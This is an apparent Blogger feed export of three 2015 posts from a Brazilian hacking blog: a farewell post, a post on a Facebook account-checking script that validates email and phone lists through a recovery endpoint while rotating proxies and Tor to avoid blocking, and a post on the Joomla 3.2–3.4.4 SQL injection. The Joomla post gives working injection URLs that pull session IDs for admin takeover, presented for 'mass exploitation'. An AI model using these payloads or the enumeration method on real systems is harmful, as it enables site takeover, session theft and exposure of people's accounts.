tag:blogger.com,1999:blog-56702323607510877992024-03-13T05:58:41.002-03:00Google INURL - BrasilAdvanced Search, Applied through dorks ("set of search operators."), Capture sensitive information, failures in servers. Group aimed at advanced filters to search engines & Digital Security Research.Anonymoushttp://www.blogger.com/profile/02635198333775610335noreply@blogger.comBlogger680125tag:blogger.com,1999:blog-5670232360751087799.post-56298579118532086662015-11-23T23:00:00.000-02:002015-11-23T23:00:12.971-02:00/* H45t4 1á v1st4 INURL BRASIL */ _exit('GoogleINURL', 'Founder');<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwHCp6bn-aaQyFspEtbL9GtI8AtQ1zpnPRDcSN-zgMMWV5-PjxZx-8VANu8nUIDOblVs52JJTDuwy-okgoPjc6tUUY8iCqUZlFX0fyaCJXTHMk-RKuNg0f2GthP0j9DPHBTooqJYFhZDb/s1600/giphy+%25282%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJwHCp6bn-aaQyFspEtbL9GtI8AtQ1zpnPRDcSN-zgMMWV5-PjxZx-8VANu8nUIDOblVs52JJTDuwy-okgoPjc6tUUY8iCqUZlFX0fyaCJXTHMk-RKuNg0f2GthP0j9DPHBTooqJYFhZDb/s640/giphy+%25282%2529.gif" width="640" /></a></div>
<span style="font-family: Courier New, Courier, monospace;"><br /><?php</span><br />/*<br />
Bom galera venho me despedir... do projeto <b>INURL BRASIL</b>.<br />
Essa caminhada começou em 2010 com a criação do BLOG: <a href="http://googleinurl.blogspot.com.br/">http://googleinurl.blogspot.com.br</a>, onde sempre postava alguns dos meus estudos,scripts,bugs e abri espaço para amigos postarem seus feitos tbm.<br />
Hoje através da divulgação de scripts que fiz, consegui colocar mais um script brasileiro em sistemas operacionais e toolkits voltados para pentest..<br />
<b>Parrot OS, Black Arch, Cyborg OS, Weakerthan Linux, Matriux OS, Netool toolkit, Sn1per.</b><br />
<br />
<br />
<ul>
<li>O blog será encerrado. manterei o mesmo online, mas sem novas postagens.</li>
<li>A pagina ficará com os admins atuais.</li>
<li>O GIT ficará online, mas sem novas atualizações.</li>
</ul>
<br />
Nesse mundo loucamente programável toda condição tem um fim, A minha veio esse ano.. sairei da INURL pra focar mais na carreira profissional, sem deixar meu lado pesquisador e coder de lado. o intuito é evoluir sempre.<br />
Saio com ar de dever cumprido ou com um reles pensamento de ter contribuído nem que seja com algumas linhas de código para cenário br coder.<br />
Aos atuais administradores criem seus blogs/sites.. algo do tipo, usem esse meio para divulgar seus feitos, trabalhos sem deixar de espalhar conhecimento aos seguidores da page(<a href="https://fb.com/InurlBrasil" target="_blank">https://fb.com/InurlBrasil</a>).<br />
<br />
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Always Thinking Outside The Box...</b></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvyU-e81AW-bJo7WRHWpH5mBUG_E3kNPTDRvDVn-oiar9-WTEgysgK9EWMn_3r8xJ4AXFTbBIIFx6BAFUNbeILew5N8pvWY4b4tNb5nharrIke8EvgbVhCZ2RDw0DN3nuVS_s-PNJyGCa/s1600/thinking_outside_the_box.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Always Thinking Outside The Box..." border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSvyU-e81AW-bJo7WRHWpH5mBUG_E3kNPTDRvDVn-oiar9-WTEgysgK9EWMn_3r8xJ4AXFTbBIIFx6BAFUNbeILew5N8pvWY4b4tNb5nharrIke8EvgbVhCZ2RDw0DN3nuVS_s-PNJyGCa/s640/thinking_outside_the_box.jpg" title="Always Thinking Outside The Box..." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b><br /></b></span>
<i>O pensamento fora da caixa é que me move.. por isso adoro criar tools, espero que esse pensamento fique na page.</i><br />
*/<br /><br />
<span style="font-family: Courier New, Courier, monospace;">require_once('class.inurl.php'); </span><br />
<span style="font-family: Courier New, Courier, monospace;">$objinurl = new Inurl('$_['Founder']='GoogleINURL'); </span><br />
<span style="font-family: Courier New, Courier, monospace;">$objinurl->_exit('23/11/2015'); </span><br />
<br />
#<i> Se alguém ferir-se usando uma faca, não vamos culpar o fabricante pelo ferimento, mas sim quem manuseia seus produtos.</i><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">?></span><br />
<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><b>exit('OBRIGADO A TODOS');</b></span></div>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2kKEB4r8_pmbyufW8qCbBgJc7_PhXGup4zsziJrJwQmjF5l1BvwEA9o5AJLzctJfwaol1Wz8elrydtTyOHLmC5o7rGTCEW1EDbuRleVWKTNsmzLKz3P5pyvOujkVMO2Tfm9HEcFD1Q_6/s1600/giphy+%25283%2529.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="exit('OBRIGADO A TODOS');" border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEis2kKEB4r8_pmbyufW8qCbBgJc7_PhXGup4zsziJrJwQmjF5l1BvwEA9o5AJLzctJfwaol1Wz8elrydtTyOHLmC5o7rGTCEW1EDbuRleVWKTNsmzLKz3P5pyvOujkVMO2Tfm9HEcFD1Q_6/s320/giphy+%25283%2529.gif" title="exit('OBRIGADO A TODOS');" width="320" /></a></div>
<div style="text-align: center;">
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">Vlw flw</b></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com19tag:blogger.com,1999:blog-5670232360751087799.post-44106319129898050682015-11-15T02:08:00.000-02:002015-11-19T21:34:23.789-02:00Facebook Check - Validando usuários.Estava ai nas madrugas sem fazer nada quando um amigo me pediu ajuda com um script PHP, que sua função seria verificar contas no <a href="http://blog.inurl.com.br/search/label/facebook" target="_blank">Facebook</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic90-6Mvi0SVjllrZXxQr5tX4n3JyLc0bdt_rfIaKNBxLftb6Y_5roS3zQAThQn5zA_jhf1O4ZLDwzPpfuJYbsA4zqR1LZApZPgxryBrwBvdvKScWMu-piSVQgEhCWReP4iJqaXjB47tvV/s1600/giphy.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic90-6Mvi0SVjllrZXxQr5tX4n3JyLc0bdt_rfIaKNBxLftb6Y_5roS3zQAThQn5zA_jhf1O4ZLDwzPpfuJYbsA4zqR1LZApZPgxryBrwBvdvKScWMu-piSVQgEhCWReP4iJqaXjB47tvV/s400/giphy.gif" width="400" /></a></div>
<br />
Sei lá tal script pode ser útil para alguém ou a logica dele, não sei quem codou o "original" não tinha referencias, por isso coloquei internamente comentário sobre dia da Edição.<br />
O script erá quase "funcional", mas a forma de request não estava correta... e também erá bloqueado facilmente pelo facebook.<br />
<i>Com isso adicionei functions de user-agent randômicos, proxy, proxy-list, proxy-tor, modifiquei a logica de request e uma validação meio "priv8" que fui debugando nos request do Facebook até achar uma maneira diferente de validar a login.</i><br />
<i><br /></i>
<a href="https://media.giphy.com/media/VOq7EdcJ8UFQA/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="O script erá quase "funcional", mas a forma de request não estava correta... e também erá bloqueado facilmente pelo facebook. Com isso adicionei functions de user-agent randômicos, proxy, proxy-list, proxy-tor, modifiquei a logica de request e uma validação meio priv8 que fui debugando nos request do Facebook até achar uma maneira diferente de validar a login." border="0" height="285" src="https://media.giphy.com/media/VOq7EdcJ8UFQA/giphy.gif" title="O script erá quase "funcional", mas a forma de request não estava correta... e também erá bloqueado facilmente pelo facebook. Com isso adicionei functions de user-agent randômicos, proxy, proxy-list, proxy-tor, modifiquei a logica de request e uma validação meio priv8 que fui debugando nos request do Facebook até achar uma maneira diferente de validar a login." width="400" /></a><br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Chega de blá blaá vamos ao script...</span></b><br />
/*<br />
<pre><b>E d i ç ã o </b>- 2.0 / 29-09-2015
-----------------------------</pre>
<pre>AUTOR: googleINURL
EMAIL: inurlbr@gmail.com
Blog: http://blog.inurl.com.br
TT: https://twitter.com/googleinurl
FB: https://fb.com/InurlBrasil
PTB: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YB: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
IRC: irc.inurl.com.br / #inurlbrasil
</pre>
<pre><div style="text-align: center;">
-----------------------------------------------------------------------------</div>
*/
<i><span style="font-size: large;">Para validação temos que seta o arquivo fonte, que pode ser emails ou numero de telefones.</span></i>
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">DEBUG SCRIPT:</span></b>
A function <span style="font-family: "courier new" , "courier" , monospace;">geral($email, $proxy = NULL)</span> envia um Request GET Para URL <span style="font-family: "courier new" , "courier" , monospace; white-space: normal;">https://www.facebook.com/ajax/login/help/identify.php</span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>GETs:</b></span><span style="font-family: "times new roman";"><span style="white-space: normal;"></span></span></pre>
<span style="font-family: "courier new" , "courier" , monospace;">ctx=recover&lsd=AVrNj_gH&email={$email}&did_submit=Procurar&__user=0&__a=1&__dyn=7xe1JAwZwRyUhxPLHwn84a2i5UdoS1Fx-ewICwPyEjwmE&__req=5&__rev=1959518</span><br />
<br />
Se o return da pagina conter a seguinte string: <span style="font-family: "courier new" , "courier" , monospace;">window.location.href= </span>significa que tal usuário existe no Facebook.<br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>De start o script pede umas informações:</b></span><br />
<br />
[ ! ] Informe o LISTA DE EMAILS<br />
------------------------------------------------<br />
[ ? ] [ SET ARQUITO ]: {SEU_ARQUIVO}<br />
<br />
[ ! ] Informe tipo de PROXY<br />
[ 1 ] - TOR<br />
[ 2 ] - MANUAL<br />
[ 3 ] - SEM PROXY / DEFAULT<br />
<div>
<div>
--------------------------------------------------</div>
<div>
[ ? ][ SET OP ]: {OPÇÃO}<br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>PRINT:</b></span></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6LN7Er2UL8lma2qVMCVL99pfkJGN-i5oMJO5tNozrDEoyJjpMvv-BevcjL6jyYBtggxK13OduS6iM_q_dPA6yYhKYQriMaN4QZ7MuUnyXf3qVd0gDAIoixCs2B7AXzFgIvuVeEYx42tt/s1600/Captura+de+tela+de+2015-11-15+01%253A06%253A25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="De inicio o script pedi umas informações:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6LN7Er2UL8lma2qVMCVL99pfkJGN-i5oMJO5tNozrDEoyJjpMvv-BevcjL6jyYBtggxK13OduS6iM_q_dPA6yYhKYQriMaN4QZ7MuUnyXf3qVd0gDAIoixCs2B7AXzFgIvuVeEYx42tt/s640/Captura+de+tela+de+2015-11-15+01%253A06%253A25.png" title="De inicio o script pedi umas informações:" width="640" /></a></div>
<div>
<br />
<br />
Com todas informações setadas:<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">PRINT EXECUTANDO:</span></b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulbSTvhqVol7WxwSaxcLbqYsJQxE0gsEJjBtMEUBTa0jjqZaUBcprXnTTNi52eaeO7mrbBDuohL5yw4T_vtDY4CbyYTLJv1vqF4n7okGhsuTrUJztF0JP53AsgukRxKscMJbvRLNMroIH/s1600/Captura+de+tela+de+2015-11-15+01%253A34%253A53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Com todas informações setadas: PRINT EXECUTANDO:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhulbSTvhqVol7WxwSaxcLbqYsJQxE0gsEJjBtMEUBTa0jjqZaUBcprXnTTNi52eaeO7mrbBDuohL5yw4T_vtDY4CbyYTLJv1vqF4n7okGhsuTrUJztF0JP53AsgukRxKscMJbvRLNMroIH/s640/Captura+de+tela+de+2015-11-15+01%253A34%253A53.png" title="Com todas informações setadas: PRINT EXECUTANDO:" width="640" /></a></div>
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>BAIXAR SCRIPT: </b></span><br />
<a href="https://gist.github.com/googleinurl/3111a343268b5bb72553" target="_blank">https://gist.github.com/googleinurl/3111a343268b5bb72553</a><br />
<br />
<a href="https://media.giphy.com/media/bQoBMCcw60MRa/giphy.gif" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="É isso, mais um script pronto. que pode ajudar alguém em uma logica futura, ou até mesmo em pentest para enumerar usuários de um bando de dados, vai da visão de cada um. Agradecer ao Sebastian Kopp que me cedeu a primeira versão do script para brincar e modificar." border="0" src="https://media.giphy.com/media/bQoBMCcw60MRa/giphy.gif" title="É isso, mais um script pronto. que pode ajudar alguém em uma logica futura, ou até mesmo em pentest para enumerar usuários de um bando de dados, vai da visão de cada um. Agradecer ao Sebastian Kopp que me cedeu a primeira versão do script para brincar e modificar." /></a><i>É isso, mais um script pronto. que pode ajudar alguém em uma logica futura, ou até mesmo em pentest para enumerar usuários de um banco de dados, vai da visão de cada um.<br />Agradecer ao Sebastian Kopp que me cedeu a primeira versão do script para brincar e modificar.</i><br />
<br />
<b>vlw flw ~</b></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com12tag:blogger.com,1999:blog-5670232360751087799.post-91971238621616784672015-10-27T03:58:00.001-02:002015-10-27T12:35:47.076-02:00Joomla SQL Injection Vulnerability Exploit Results in Full Administrative Access / inurlbr scanner for mass exploitation.<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFOzMpQsGDv7h_oMz6XNq_QAot-xCevha3HblYy4nH-mV-DeotjjocG1xX6lF0ZRwbNafl47WMKwZ5_lUNxkptmRTL5_jYwyVg7FtG_jYXiw8RMGv9C_mPv-BVSyuMLFc-d8zVG0rliSIZ/s1600/joomla-website-security.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site. Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it. CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks. The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research." border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFOzMpQsGDv7h_oMz6XNq_QAot-xCevha3HblYy4nH-mV-DeotjjocG1xX6lF0ZRwbNafl47WMKwZ5_lUNxkptmRTL5_jYwyVg7FtG_jYXiw8RMGv9C_mPv-BVSyuMLFc-d8zVG0rliSIZ/s640/joomla-website-security.png" title="Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site. Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla. CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it. CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks. The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research." width="640" /></a></div>
<br />
<br />
Joomla CMS that affects more than 2.8 million sites.<br />
Joomla is probably one of web content management (or CMS) more used to creating websites at the enterprise level but also widely used for developing personal websites.<br />
It is an Open source software under the GNU / GPL license, being updated by a community of programmers organized a non-profit structure (Joomla.org).<br />
According to Trustwave joomla CMS (3.2 to 3.4.4) have serious security flaws enabling SQL Injection-type attacks which allow attackers to "win" platform Administrator privileges<br />
<br />
Trustwave SpiderLabs researcher <b><a href="https://www.linkedin.com/pub/asaf-orpani/105/878/441/pt" target="_blank">Asaf Orpani </a></b>has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (<a href="http://blog.inurl.com.br/search/label/cms" target="_blank">CMS</a>). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative <b>access</b> to any vulnerable Joomla site.<br />
<br />
Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">CVE-2015-7297</span>, <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7857</span>, and <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7858</span> cover the SQL injection vulnerability and various mutations related to it.<br />
<br />
<span style="font-family: Courier New, Courier, monospace;">CVE-2015-7857 </span>enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.<br />
<br />
The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.<br />
Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.<br />
Asaf also uncovered the related vulnerabilities <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7858 </span>and <span style="font-family: Courier New, Courier, monospace;">CVE-2015-7297</span> as part of his research.<br />
<a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">Trustwave SpiderLabs</a> <i>recommends that ALL Joomla users update their Joomla installations to version 3.4.5.</i><br />
<b>UPDATE:</b><br />
<a href="https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html" style="font-style: italic;" target="_blank">https://www.joomla.org/announcements/release-news/5634-joomla-3-4-5-released.html</a><br />
<b>Source INFO</b>-> <a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0" target="_blank">[ More Info ]</a><br />
<br />
It was found that the following code snippet is vulnerable <a href="http://blog.inurl.com.br/search/label/sqli" target="_blank">SQLI</a>:<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PWD: </span></b><span style="font-family: Courier New, Courier, monospace;">/administrator/components/com_contenthistory/models/history.php</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSV0AIicLGbu5Y5ODkvj735eNKsa6unAn1R2ljphQn8JTXIrnaU1aFe1-VJn9EOFv2Uy64Y6jsM1VsQW_WYZ07ikeKD28tFihZDvjwkq2V2Rz9Vio1asGMgme5En5tYRJH9nok0GqtIah/s1600/6a0133f264aa62970b01bb08850b60970d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php" border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNSV0AIicLGbu5Y5ODkvj735eNKsa6unAn1R2ljphQn8JTXIrnaU1aFe1-VJn9EOFv2Uy64Y6jsM1VsQW_WYZ07ikeKD28tFihZDvjwkq2V2Rz9Vio1asGMgme5En5tYRJH9nok0GqtIah/s640/6a0133f264aa62970b01bb08850b60970d.png" title="The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4. Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable. Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research. Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Source-> more info It was found that the following code snippet is vulnerable SQLI: PWD: /administrator/components/com_contenthistory/models/history.php" width="640" /></a>
</div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">FUNCTION FULL:</span></b><br />
<pre><pre> /**
* <b>Build an SQL query to load the list data.</b>
*
* @return JDatabaseQuery
*
* @since 3.2
*/
protected function getListQuery()
{
// Create a new query object.
$db = $this->getDbo();
$query = $db->getQuery(true);
<b> // Select the required fields from the table.
$query->select(
$this->getState(
'list.select',
'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
)
)</b>
->from($db->quoteName('#__ucm_history') . ' AS h')
->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))
// Join over the users for the editor
->select('uc.name AS editor')
->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');
// Add the list ordering clause.
$orderCol = $this->state->get('list.ordering');
$orderDirn = $this->state->get('list.direction');
$query->order($db->quoteName($orderCol) . $orderDirn);
return $query;
}</pre>
</pre>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>CODE FULL:</b></span><br />
<a href="http://pastebin.com/9FnPuns5" target="_blank">http://pastebin.com/9FnPuns5</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>PoC:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">REQUEST GET</span><br />
<span style="font-family: Courier New, Courier, monospace;">http://{TARGET}<b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)</b></span><br />
<div>
<br />
<i>It is possible to extract session ID (cookies) of users logged into the system and set in your browser.</i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyKQWmtX2Qx973bLM7ZyRR3jNimgkSXBQmm7Vlw6psv1Lcp4YbmMTaYDozsI8mcMiTo5Cg_2HdBSCAYjxFV-N0Mcpn_vt4uzaWBaPmrh3nIJGIzgn16bxxZ_rJQbKw0Z8d-77rqDrStv0U/s1600/6a0133f264aa62970b01bb08850b77970d.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) It is possible to extract session ID (cookies) of users logged into the system and set in your browser." border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyKQWmtX2Qx973bLM7ZyRR3jNimgkSXBQmm7Vlw6psv1Lcp4YbmMTaYDozsI8mcMiTo5Cg_2HdBSCAYjxFV-N0Mcpn_vt4uzaWBaPmrh3nIJGIzgn16bxxZ_rJQbKw0Z8d-77rqDrStv0U/s640/6a0133f264aa62970b01bb08850b77970d.png" title="REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) It is possible to extract session ID (cookies) of users logged into the system and set in your browser." width="640" /></a></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Video demonstration:</b></span><br />
<br />
<iframe allowfullscreen="" frameborder="0" height="450" src="https://www.youtube.com/embed/DOpryDLFSxM" width="100%"></iframe>
<br />
<i>In this article we will work SQLI exploitation.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>RETURN REQUEST - Exemple Explotation</b></span><b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">:</b><br />
<b>URL:</b><br />
<span style="font-family: Courier New, Courier, monospace;">http://{TARGET}<b>/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>PRINT REQUEST:</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJS0MdBI-ET9jYdWTSo99rQDtF0_60D_tYmrkN85YCVMgZeP15xccIF_9BZyLvQyICul49nc_tt2BK2hx49yFHHTg5jBQvLnyT9Wt4u5WMbt1uzqaWd0ZuBRwa_tjWjQIW6uSXq27DJ2D/s1600/Captura+de+tela+de+2015-10-26+22%253A59%253A06.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) PRINT REQUEST:" border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirJS0MdBI-ET9jYdWTSo99rQDtF0_60D_tYmrkN85YCVMgZeP15xccIF_9BZyLvQyICul49nc_tt2BK2hx49yFHHTg5jBQvLnyT9Wt4u5WMbt1uzqaWd0ZuBRwa_tjWjQIW6uSXq27DJ2D/s640/Captura+de+tela+de+2015-10-26+22%253A59%253A06.png" title="PoC: REQUEST GET http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM jml_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) RETURN REQUEST - Exemple Explotation: URL: http://{TARGET}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=1+AND+(SELECT+5030+FROM(SELECT+COUNT(*),CONCAT(0x203a494e55524c42523a20,version(),0x203a494e55524c42523a20,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a) PRINT REQUEST:" width="640" /></a></div>
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Base validation:</span></b><br />
<b>ENCODER HEX</b> = <span style="font-family: Georgia, Times New Roman, serif;">:INURLBR: </span><br />
<b>RESULT</b> = <span style="font-family: Courier New, Courier, monospace;">0x203a494e55524c42523a20</span><br />
<br />
